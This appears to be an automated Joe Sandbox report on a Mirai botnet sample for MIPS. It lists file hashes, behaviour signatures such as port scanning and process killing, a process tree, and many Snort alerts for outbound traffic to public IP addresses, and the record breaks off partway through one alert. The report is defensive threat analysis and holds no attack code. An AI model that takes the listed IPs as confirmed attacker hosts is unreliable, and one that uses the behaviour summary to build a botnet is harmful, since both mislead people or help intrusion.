Create Interactive Tour

Linux Analysis Report
E6l0C6FObI.elf

Overview

General Information

Sample name:	E6l0C6FObI.elf renamed because original name is a hash value
Original sample name:	e21f23ebe6bea02a2b38ed8b892fcc50.elf
Analysis ID:	1391984
MD5:	e21f23ebe6bea02a2b38ed8b892fcc50
SHA1:	4982c3733fcd4a8315f0ca2c47d4d0a98e429dfa
SHA256:	630cfde6992fd4c30f0a93ea553acf8b480cb93b7cf06f80bfa827ef384cee20
Tags:	32elfmipsmirai
Infos:

Detection

Mirai

Score:	92
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Detected Mirai

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected Mirai

Connects to many ports of the same IP (likely port scanning)

Sample tries to kill multiple processes (SIGKILL)

Uses known network protocols on non-standard ports

Detected TCP or UDP traffic on non-standard ports

Enumerates processes within the "proc" file system

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample has stripped symbol table

Sample listens on a socket

Sample tries to kill a process (SIGKILL)

Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.

Static ELF header machine description suggests that the sample might not execute correctly on this machine.

Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1391984
Start date and time:	2024-02-14 09:27:33 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	E6l0C6FObI.elf renamed because original name is a hash value
Original Sample Name:	e21f23ebe6bea02a2b38ed8b892fcc50.elf
Detection:	MAL
Classification:	mal92.spre.troj.linELF@0/0@2/0

Warnings

Report size exceeded maximum capacity and may have missing network information.

Runtime Messages

Command:	/tmp/E6l0C6FObI.elf
PID:	5827
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	Infected By Cult
Standard Error:

Process Tree

system is lnxubuntu20

E6l0C6FObI.elf (PID: 5827, Parent: 5752, MD5: 0d6f61f82cf2f781c6eb0661071d42d9) Arguments: /tmp/E6l0C6FObI.elf

E6l0C6FObI.elf New Fork (PID: 5830, Parent: 5827)

E6l0C6FObI.elf New Fork (PID: 5832, Parent: 5827)

E6l0C6FObI.elf New Fork (PID: 5833, Parent: 5827)

E6l0C6FObI.elf New Fork (PID: 5836, Parent: 5833)

E6l0C6FObI.elf New Fork (PID: 5837, Parent: 5833)

E6l0C6FObI.elf New Fork (PID: 5841, Parent: 5833)

E6l0C6FObI.elf New Fork (PID: 5843, Parent: 5833)

E6l0C6FObI.elf New Fork (PID: 5845, Parent: 5833)

E6l0C6FObI.elf New Fork (PID: 5847, Parent: 5833)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Mirai	Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.	No Attribution	http://osint.bambenekconsulting.com/feeds/ http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Mirai_12	Yara detected Mirai	Joe Security

Snort Signatures

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.68.11.200

Timestamp:	192.168.2.1595.68.11.20059206802839471 02/14/24-09:30:11.643542
SID:	2839471
Source Port:	59206
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.166.212.55

Timestamp:	192.168.2.15112.166.212.5552944802839471 02/14/24-09:28:49.299902
SID:	2839471
Source Port:	52944
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.211.247.164

Timestamp:	192.168.2.1595.211.247.16432972802839471 02/14/24-09:29:38.517012
SID:	2839471
Source Port:	32972
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.100.100.70

Timestamp:	192.168.2.1595.100.100.7049146802839471 02/14/24-09:30:31.545066
SID:	2839471
Source Port:	49146
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.163.141.100

Timestamp:	192.168.2.1595.163.141.10035438802839471 02/14/24-09:29:19.037392
SID:	2839471
Source Port:	35438
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.167.244.204

Timestamp:	192.168.2.15112.167.244.20459956802839471 02/14/24-09:30:34.346873
SID:	2839471
Source Port:	59956
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.121.179.134

Timestamp:	192.168.2.15112.121.179.13460588802839471 02/14/24-09:30:29.619568
SID:	2839471
Source Port:	60588
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.101.253.210

Timestamp:	192.168.2.1595.101.253.21057328802839471 02/14/24-09:30:31.536430
SID:	2839471
Source Port:	57328
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.167.23.17

Timestamp:	192.168.2.1595.167.23.1745826802839471 02/14/24-09:30:43.761363
SID:	2839471
Source Port:	45826
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.221.105.185

Timestamp:	192.168.2.1588.221.105.18538792802839471 02/14/24-09:30:16.578437
SID:	2839471
Source Port:	38792
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.43.199.250

Timestamp:	192.168.2.1595.43.199.25060442802839471 02/14/24-09:29:13.571891
SID:	2839471
Source Port:	60442
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.100.185.228

Timestamp:	192.168.2.1595.100.185.22839508802839471 02/14/24-09:30:59.656689
SID:	2839471
Source Port:	39508
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.101.187.61

Timestamp:	192.168.2.1595.101.187.6148162802839471 02/14/24-09:29:35.282739
SID:	2839471
Source Port:	48162
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.110.224.250

Timestamp:	192.168.2.1595.110.224.25060494802839471 02/14/24-09:29:05.609109
SID:	2839471
Source Port:	60494
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.49.0.208

Timestamp:	192.168.2.1595.49.0.20857094802839471 02/14/24-09:29:08.989994
SID:	2839471
Source Port:	57094
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.85.242.201

Timestamp:	192.168.2.15112.85.242.20144192802839471 02/14/24-09:30:09.286325
SID:	2839471
Source Port:	44192
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.141.128.200

Timestamp:	192.168.2.1595.141.128.20050714802839471 02/14/24-09:29:05.664029
SID:	2839471
Source Port:	50714
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.86.78.146

Timestamp:	192.168.2.1595.86.78.14654268802839471 02/14/24-09:28:47.616648
SID:	2839471
Source Port:	54268
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.101.214.35

Timestamp:	192.168.2.1595.101.214.3556312802839471 02/14/24-09:30:21.588243
SID:	2839471
Source Port:	56312
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.212.252.120

Timestamp:	192.168.2.1588.212.252.12049512802839471 02/14/24-09:31:16.444367
SID:	2839471
Source Port:	49512
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.153.253.45

Timestamp:	192.168.2.1595.153.253.4558916802839471 02/14/24-09:29:08.781543
SID:	2839471
Source Port:	58916
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.244.58.83

Timestamp:	192.168.2.1595.244.58.8333966802839471 02/14/24-09:30:44.630447
SID:	2839471
Source Port:	33966
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.142.121.34

Timestamp:	192.168.2.1595.142.121.3434276802839471 02/14/24-09:30:11.623507
SID:	2839471
Source Port:	34276
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.220.84.186

Timestamp:	192.168.2.1588.220.84.18660332802839471 02/14/24-09:29:19.501376
SID:	2839471
Source Port:	60332
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.81.32.41

Timestamp:	192.168.2.1595.81.32.4139368802839471 02/14/24-09:30:52.951399
SID:	2839471
Source Port:	39368
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.83.36.62

Timestamp:	192.168.2.15112.83.36.6245420802839471 02/14/24-09:30:36.982645
SID:	2839471
Source Port:	45420
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.100.51.150

Timestamp:	192.168.2.1595.100.51.15049448802839471 02/14/24-09:29:56.731548
SID:	2839471
Source Port:	49448
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.45.120.187

Timestamp:	192.168.2.15112.45.120.18759888802839471 02/14/24-09:29:22.117430
SID:	2839471
Source Port:	59888
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.45.120.187

Timestamp:	192.168.2.15112.45.120.18759886802839471 02/14/24-09:29:22.114845
SID:	2839471
Source Port:	59886
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.74.103.111

Timestamp:	192.168.2.15112.74.103.11151472802839471 02/14/24-09:29:01.726292
SID:	2839471
Source Port:	51472
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.58.75.221

Timestamp:	192.168.2.1595.58.75.22149394802839471 02/14/24-09:29:19.100236
SID:	2839471
Source Port:	49394
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.174.163.106

Timestamp:	192.168.2.1588.174.163.10660954802839471 02/14/24-09:30:19.606172
SID:	2839471
Source Port:	60954
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.150.154.89

Timestamp:	192.168.2.1588.150.154.8943550802839471 02/14/24-09:29:40.557095
SID:	2839471
Source Port:	43550
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.79.128.165

Timestamp:	192.168.2.1595.79.128.16557886802839471 02/14/24-09:28:56.086124
SID:	2839471
Source Port:	57886
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.221.230.144

Timestamp:	192.168.2.1588.221.230.14442514802839471 02/14/24-09:30:08.380688
SID:	2839471
Source Port:	42514
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.181.231.226

Timestamp:	192.168.2.1595.181.231.22646230802839471 02/14/24-09:30:53.105817
SID:	2839471
Source Port:	46230
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.58.114.139

Timestamp:	192.168.2.1595.58.114.13949862802839471 02/14/24-09:30:24.552039
SID:	2839471
Source Port:	49862
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.141.36.146

Timestamp:	192.168.2.1595.141.36.14636812802839471 02/14/24-09:29:38.534025
SID:	2839471
Source Port:	36812
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.181.203.44

Timestamp:	192.168.2.1595.181.203.4443532802839471 02/14/24-09:29:08.750037
SID:	2839471
Source Port:	43532
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.42.29.201

Timestamp:	192.168.2.1595.42.29.20150536802839471 02/14/24-09:30:59.704800
SID:	2839471
Source Port:	50536
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.216.175.59

Timestamp:	192.168.2.1595.216.175.5938118802839471 02/14/24-09:30:33.984536
SID:	2839471
Source Port:	38118
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.216.129.122

Timestamp:	192.168.2.1588.216.129.12251042802839471 02/14/24-09:30:00.863592
SID:	2839471
Source Port:	51042
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.100.53.49

Timestamp:	192.168.2.1595.100.53.4955624802839471 02/14/24-09:28:57.744321
SID:	2839471
Source Port:	55624
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.101.14.86

Timestamp:	192.168.2.1595.101.14.8657698802839471 02/14/24-09:29:35.314523
SID:	2839471
Source Port:	57698
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.84.249.57

Timestamp:	192.168.2.1595.84.249.5746630802839471 02/14/24-09:30:37.298135
SID:	2839471
Source Port:	46630
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.211.60.130

Timestamp:	192.168.2.1595.211.60.13055122802839471 02/14/24-09:30:14.130736
SID:	2839471
Source Port:	55122
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.217.7.135

Timestamp:	192.168.2.1595.217.7.13544636802839471 02/14/24-09:30:59.698562
SID:	2839471
Source Port:	44636
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.198.147.174

Timestamp:	192.168.2.1588.198.147.17440722802839471 02/14/24-09:29:15.463004
SID:	2839471
Source Port:	40722
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.181.129.220

Timestamp:	192.168.2.1595.181.129.22056122802839471 02/14/24-09:30:19.657488
SID:	2839471
Source Port:	56122
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.215.140.7

Timestamp:	192.168.2.1595.215.140.734720802839471 02/14/24-09:30:52.968460
SID:	2839471
Source Port:	34720
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.186.20.38

Timestamp:	192.168.2.15112.186.20.3859798802839471 02/14/24-09:30:59.252997
SID:	2839471
Source Port:	59798
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.187.12.111

Timestamp:	192.168.2.15112.187.12.11156622802839471 02/14/24-09:31:20.467140
SID:	2839471
Source Port:	56622
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.101.16.151

Timestamp:	192.168.2.1595.101.16.15158734802839471 02/14/24-09:29:56.519559
SID:	2839471
Source Port:	58734
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.85.210.224

Timestamp:	192.168.2.1595.85.210.22436270802839471 02/14/24-09:30:48.374166
SID:	2839471
Source Port:	36270
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.111.218.63

Timestamp:	192.168.2.1595.111.218.6334790802839471 02/14/24-09:28:47.699644
SID:	2839471
Source Port:	34790
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.86.82.1

Timestamp:	192.168.2.1595.86.82.147552802839471 02/14/24-09:30:24.722511
SID:	2839471
Source Port:	47552
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.217.25.150

Timestamp:	192.168.2.1595.217.25.15034422802839471 02/14/24-09:29:42.750446
SID:	2839471
Source Port:	34422
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.165.98.59

Timestamp:	192.168.2.15112.165.98.5937194802839471 02/14/24-09:30:37.753827
SID:	2839471
Source Port:	37194
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.58.76.157

Timestamp:	192.168.2.1595.58.76.15736418802839471 02/14/24-09:28:47.692129
SID:	2839471
Source Port:	36418
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.101.142.194

Timestamp:	192.168.2.1595.101.142.19459116802839471 02/14/24-09:29:05.592924
SID:	2839471
Source Port:	59116
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.100.251.107

Timestamp:	192.168.2.1595.100.251.10742384802839471 02/14/24-09:29:09.708497
SID:	2839471
Source Port:	42384
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.100.245.131

Timestamp:	192.168.2.1595.100.245.13147714802839471 02/14/24-09:30:50.491498
SID:	2839471
Source Port:	47714
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.101.3.191

Timestamp:	192.168.2.1595.101.3.19146918802839471 02/14/24-09:29:24.633960
SID:	2839471
Source Port:	46918
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.158.244.29

Timestamp:	192.168.2.1595.158.244.2936510802839471 02/14/24-09:29:29.717200
SID:	2839471
Source Port:	36510
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.166.153.201

Timestamp:	192.168.2.1595.166.153.20150462802839471 02/14/24-09:29:29.687043
SID:	2839471
Source Port:	50462
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.127.183.253

Timestamp:	192.168.2.15112.127.183.25356418802839471 02/14/24-09:31:05.847533
SID:	2839471
Source Port:	56418
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.73.170.175

Timestamp:	192.168.2.1595.73.170.17547280802839471 02/14/24-09:28:55.841909
SID:	2839471
Source Port:	47280
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.164.62.167

Timestamp:	192.168.2.1595.164.62.16746354802839471 02/14/24-09:30:53.678962
SID:	2839471
Source Port:	46354
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.223.39.29

Timestamp:	192.168.2.15112.223.39.2933812802839471 02/14/24-09:28:47.093985
SID:	2839471
Source Port:	33812
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.74.18.106

Timestamp:	192.168.2.15112.74.18.10633192802839471 02/14/24-09:29:54.963770
SID:	2839471
Source Port:	33192
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.143.149.193

Timestamp:	192.168.2.1595.143.149.19359914802839471 02/14/24-09:29:57.053016
SID:	2839471
Source Port:	59914
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.185.157.90

Timestamp:	192.168.2.15112.185.157.9047802802839471 02/14/24-09:30:13.949038
SID:	2839471
Source Port:	47802
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.126.92.47

Timestamp:	192.168.2.15112.126.92.4752440802839471 02/14/24-09:31:12.841885
SID:	2839471
Source Port:	52440
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.222.35.158

Timestamp:	192.168.2.15112.222.35.15840938802839471 02/14/24-09:29:48.338599
SID:	2839471
Source Port:	40938
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.200.187.9

Timestamp:	192.168.2.15112.200.187.951780802839471 02/14/24-09:29:27.149485
SID:	2839471
Source Port:	51780
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.127.222.121

Timestamp:	192.168.2.1595.127.222.12157020802839471 02/14/24-09:29:40.613939
SID:	2839471
Source Port:	57020
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.134.64.163

Timestamp:	192.168.2.1595.134.64.16355098802839471 02/14/24-09:30:37.227998
SID:	2839471
Source Port:	55098
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.59.137.3

Timestamp:	192.168.2.1595.59.137.356688802839471 02/14/24-09:29:46.521625
SID:	2839471
Source Port:	56688
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.216.114.32

Timestamp:	192.168.2.1595.216.114.3251392802839471 02/14/24-09:29:05.609447
SID:	2839471
Source Port:	51392
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.168.78.3

Timestamp:	192.168.2.1595.168.78.359198802839471 02/14/24-09:30:23.896672
SID:	2839471
Source Port:	59198
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.186.20.38

Timestamp:	192.168.2.15112.186.20.3859690802839471 02/14/24-09:30:55.205815
SID:	2839471
Source Port:	59690
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.101.181.53

Timestamp:	192.168.2.1595.101.181.5339168802839471 02/14/24-09:29:54.450278
SID:	2839471
Source Port:	39168
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.141.251.249

Timestamp:	192.168.2.1595.141.251.24936532802839471 02/14/24-09:31:09.838797
SID:	2839471
Source Port:	36532
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.101.47.91

Timestamp:	192.168.2.1595.101.47.9135212802839471 02/14/24-09:29:24.641128
SID:	2839471
Source Port:	35212
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.171.68.227

Timestamp:	192.168.2.15112.171.68.22752590802839471 02/14/24-09:30:03.879540
SID:	2839471
Source Port:	52590
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.47.11.210

Timestamp:	192.168.2.15112.47.11.21053568802839471 02/14/24-09:29:03.983740
SID:	2839471
